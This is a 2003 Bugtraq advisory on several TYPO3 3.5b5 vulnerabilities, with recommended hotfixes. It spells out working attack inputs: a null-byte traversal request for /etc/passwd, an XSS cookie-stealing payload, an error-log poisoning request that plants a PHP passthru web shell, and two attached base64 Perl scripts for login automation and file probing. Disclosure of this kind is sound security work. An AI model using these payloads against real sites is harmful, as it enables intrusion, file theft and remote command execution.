[29094] in bugtraq
typo3 issues
daemon@ATHENA.MIT.EDU (Martin Eiszner)
Fri Feb 28 12:53:20 2003
Date: Fri, 28 Feb 2003 10:37:04 +0100
From: Martin Eiszner <martin@websec.org>
To: bugtraq@securityfocus.com
Message-Id: <20030228103704.1b657228.martin@websec.org>
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0"
--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
hola, ...
2002@WebSec.org/Martin Eiszner
=====================
Security REPORT TYPO3
=====================
this document: http://www.websec.org/adv/typo3.html
Product: Typo3 (Version 3.5b5 / Earlier versions are possibly vulnerable too)
Vendor: Typo3 (http://www.typo3.com)
Vendor-Status: kasper@typo3.com informed / new version OUT
Vendor-Patch: http://typo3.org/1331.0.html
Local: NO
Remote: YES
Vulnerabilities:
-path-disclosure
-proof of file-existense
-arbitrary file retrieval
-arbitrary command execution
-CrossSiteScripting / privilege escalation / cookie-theft
-install/config files and scripts within webroot
Severity: MEDIUM to HIGH
Tested Plattforms: Linux / Slackware i686 / Apache 1.3.23 / PHP 4.1.2
============
Introduction
============
Taken from http://www.typo3.com
TYPO3 is a free Open Source content management system for enterprise purposes
on the web and in intranets. It offers full flexibility and extendability while
featuring an accomplished set of ready-made interfaces, functions and modules.
=====================
Vulnerability Details
=====================
0) CLIENT-SIDE DATA-OBFUSCATION
form-fields are obfuscated using client-side java-script routines.
after the fields are joined a java-script creates MD5-hashes and
submits the form.
examples: index.php (account-data), showpic.php(name-checksum)
attached perl-scripts (typo.pl/showpic.pl) demonstrate how to circumvent
this protection.
1) PATH-DISCLOSURE
several test-, class- and library-scripts can be found within webroot.
some of them can be forced to produce runtime errors and output their
physical path.
example: /fileadmin/include_test.php
2) PROOF OF FILE-EXISTENCE
"showpic.php" and "thumbs.php" allow an attacker to check the existense of
arbitrary files.
combined with file-enumeration methods it is possible to reconstruct parts
of the directory- and filesystem - structure.
example on howto check for existing files with attached perl-script "showpic.pl":
---*---
sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
../../../../../../../../../../etc/hosts exists
---*---
3) CROSS SITE SCRIPTING / COOKIE-THEFT
all system and login-errors are saved in the typo3-database.
administrators can view all the erroneous data.
since this data is not being checked for XSS-content it is possible to include
client-side script(java-script)-tags in these entries.
every time the admins view their logs these scripts will be run on the admins
web-browser which leads to a typical XSS-bug.
thus making it possible to steal the admins-cookies or let him open a new
user-account without his knowledge.
example with the attached "typo.pl" - perlscript:
---*---
sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
---*---
viewing the logfiles will execute the script.
4) ARBITRARY FILE-RETRIEVAL
the "dev/translations.php" - script does not check the
ONLY-parameter for malicious values.
a relative path combined with a Nullbyte lead to the inclusion of the
given file.
example http-request:
---*---
GET http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
---*---
5) ARBITRARY COMMAND EXECUTION
extends vulnerability number 4):
if the included file contains php-source code it will be executed.
thus allowing an attacker to execute operating-system commands and
at long sight escalate his privileges.
example:
---*---
a file for placing our malicious php-source is needed.
if there is no file we have write-access we still can use the websevers-logfiles.
the following http-request:
---cut---
http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
---cut---
creates this entry:
---cut---
[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru(\$c
)?>' >> ./x.php` ?>
---cut---
in a typicall apache - error_log file.
using the method discussed under 4) the following http-request:
---cut---
http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00'
---cut---
will include the apach error_log in our output and execute our php-commands.
as a result we will find x.php in our "/dev" directory.
x.php:
---cut---
<?passthru($c)?>
---cut---
---*---
6) SCRIPTS AND DIRECTORIES IN WEBROOT
a couple of scripts, libraries, files and directories can be found within typo3s
webroot.
"/install" is improper protected and vulnerable to brute-force attacks.
"/fileadmin" directory reveals log-files and demo-scripts
"/typo3conf" directory contains the localconf.php,database.sql and other sensitive files
=======
Remarks
=======
the serious vulnerabilities rely on the "/dev" (developer?) - directory.
scripts within this directory can be found in many/most production-environments!
====================
Recommended Hotfixes
====================
overall) install the new Version !
or
1) remove "/install" directory
2) remove "/dev" directory
3) Choose strong administrator-passwords
4) showpic.php and thumbs.php must be patched.
5) remove all demo-directories and protect "/fileadmin" and "/typo3conf"
EOF Martin Eiszner / @2002WebSec.org
=======
Contact
=======
--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37
--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0
Content-Type: application/octet-stream;
name="typo.pl"
Content-Disposition: attachment;
filename="typo.pl"
Content-Transfer-Encoding: base64
IyEvdXNyL2Jpbi9wZXJsCnVzZSBzdHJpY3Q7CnVzZSBHZXRvcHQ6OlN0ZDsKdXNlIExXUDo6VXNl
ckFnZW50Owp1c2UgSFRUUDo6UmVxdWVzdDsKdXNlIEhUVFA6OlJlc3BvbnNlOwp1c2UgSFRUUDo6
SGVhZGVyczsKdXNlIEhUTUw6OkZvcm07CnVzZSBEaWdlc3Q6Ok1ENSBxdyhtZDVfaGV4KTsKCm15
ICgkdGhlaG9zdCwkYWNjb3VudCkgPSBAQVJHVjsKbXkgKCR1aWQsJHB3ZCkgPSBzcGxpdCgvOi8s
JGFjY291bnQsMik7Cm15ICRwYXNzID0gJHB3ZDsKcHJpbnQgIlxuY2hlY2tpbmcgJHRoZWhvc3Qg
fCAkdWlkIHwgJHB3ZFxuIjsKJHB3ZCA9IG1kNV9oZXgoIiRwd2QiKTsKCm15ICRjb250ZW50ID0g
IiI7Cm15ICR1c2VyaWRlbnQgPSAiIjsKCm15ICRoZHMgPSBIVFRQOjpIZWFkZXJzLT5uZXc7Cm15
ICR1YSA9IG5ldyBMV1A6OlVzZXJBZ2VudCgpOwpwdXNoIEB7ICR1YS0+cmVxdWVzdHNfcmVkaXJl
Y3RhYmxlIH0sICdQT1NUJzsKJHVhLT5hZ2VudCgiT3BlcmEgNi4wIik7CgpteSAkdXJpID0gImh0
dHA6Ly8iLiR0aGVob3N0LiIvdHlwbzMvdHlwbzMvaW5kZXgucGhwIjsKbXkgJHJlcSA9IEhUVFA6
OlJlcXVlc3QtPm5ldygiR0VUIiwgJHVyaSwgJGhkcywgJGNvbnRlbnQpOwpteSAkcmVzID0gJHVh
LT5yZXF1ZXN0KCRyZXEpOwpteSAkcmVzX2hlYWRzID0gJHJlcy0+aGVhZGVyczsKCm15ICRjb29r
aWUgPSAkcmVzX2hlYWRzLT5oZWFkZXIoIlNldC1Db29raWUiKTsKbXkgJGZvcm0gPSBIVE1MOjpG
b3JtLT5wYXJzZSgkcmVzLT5jb250ZW50LCAiJHVyaSIpOwpteSAkY2hhbGxlbmdlID0gJGZvcm0t
PnZhbHVlKCJjaGFsbGVuZ2UiKTsKJHVzZXJpZGVudCA9IG1kNV9oZXgoIiR1aWQ6JHB3ZDokY2hh
bGxlbmdlIik7CgokaGRzLT5oZWFkZXIoJ0Nvb2tpZScgPT4gIiRjb29raWUiKTsKJGhkcy0+aGVh
ZGVyKCdDb250ZW50LVR5cGUnID0+ICAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVk
Iik7CiRjb250ZW50ID0gICJ1c2VybmFtZT0kdWlkJnBfZmllbGQ9JnVzZXJpZGVudD0kdXNlcmlk
ZW50JmNoYWxsZW5nZT0kY2hhbGxlbmdlJnJlZGlyZWN0X3VybD1hbHRfbWFpbi5waHAiOwokY29u
dGVudCAuPSAiJmxvZ2luUmVmcmVzaD0mbG9naW5fc3RhdHVzPWxvZ2luJmludGVyZmFjZT1hbHRl
cm5hdGl2ZSI7CgpteSAkcmVxID0gSFRUUDo6UmVxdWVzdC0+bmV3KCJQT1NUIiwgJHVyaSwgJGhk
cywgJGNvbnRlbnQpOwpteSAkcmVzID0gJHVhLT5yZXF1ZXN0KCRyZXEpOwoKJHJlc19oZWFkcyA9
ICRyZXMtPmhlYWRlcnM7CiRjb29raWUgPSAkcmVzX2hlYWRzLT5oZWFkZXIoIlNldC1Db29raWUi
KTsKCnByaW50ICJcblJlc2NvZGU6Ii4kcmVzLT5jb2RlKCkuIlxuIi4kcmVzX2hlYWRzLT5hc19z
dHJpbmcoKS4iXG5cbiI7CiNwcmludCAiXG4iLiRyZXNfaGVhZHMtPmFzX3N0cmluZygpLiJcblxu
Ii4kcmVzLT5jb250ZW50KCkuIlxuXG4iOwo=
--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0
Content-Type: application/octet-stream;
name="showpic.pl"
Content-Disposition: attachment;
filename="showpic.pl"
Content-Transfer-Encoding: base64
IyEvdXNyL2Jpbi9wZXJsCnVzZSBMV1A6OlVzZXJBZ2VudDsKdXNlIEhUVFA6OlJlcXVlc3Q7CnVz
ZSBIVFRQOjpSZXNwb25zZTsKdXNlIERpZ2VzdDo6TUQ1IHF3KG1kNV9oZXgpOwooJGhvLCRmaSkg
PSBAQVJHVjsKJG1kNSA9IG1kNV9oZXgoIiRmaXx8fHwiKTsKJHVhID0gbmV3IExXUDo6VXNlckFn
ZW50KCk7ICR1YS0+YWdlbnQoIk9wZXJhIDYuMCIpOwokdXJpID0gImh0dHA6Ly8iLiRoby4iL3R5
cG8zL3Nob3dwaWMucGhwP2ZpbGU9JGZpJm1kNT0kbWQ1IjsKJHJlcSA9IEhUVFA6OlJlcXVlc3Qt
Pm5ldygiR0VUIiwkdXJpKTsKJHJlcyA9ICR1YS0+cmVxdWVzdCgkcmVxKTsKaWYgKCRyZXMtPmNv
bnRlbnQgIX4gL3dhcyBub3QgZm91bmQvICYmICRyZXMtPmNvbnRlbnQgIX4gL05vIHZhbGlkLykg
e3ByaW50ICJcbiRmaSBleGlzdHNcbiI7fQplbHNlIHtwcmludCAiXG4kZmkgbm90IGZvdW5kXG4i
O30K
--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0--
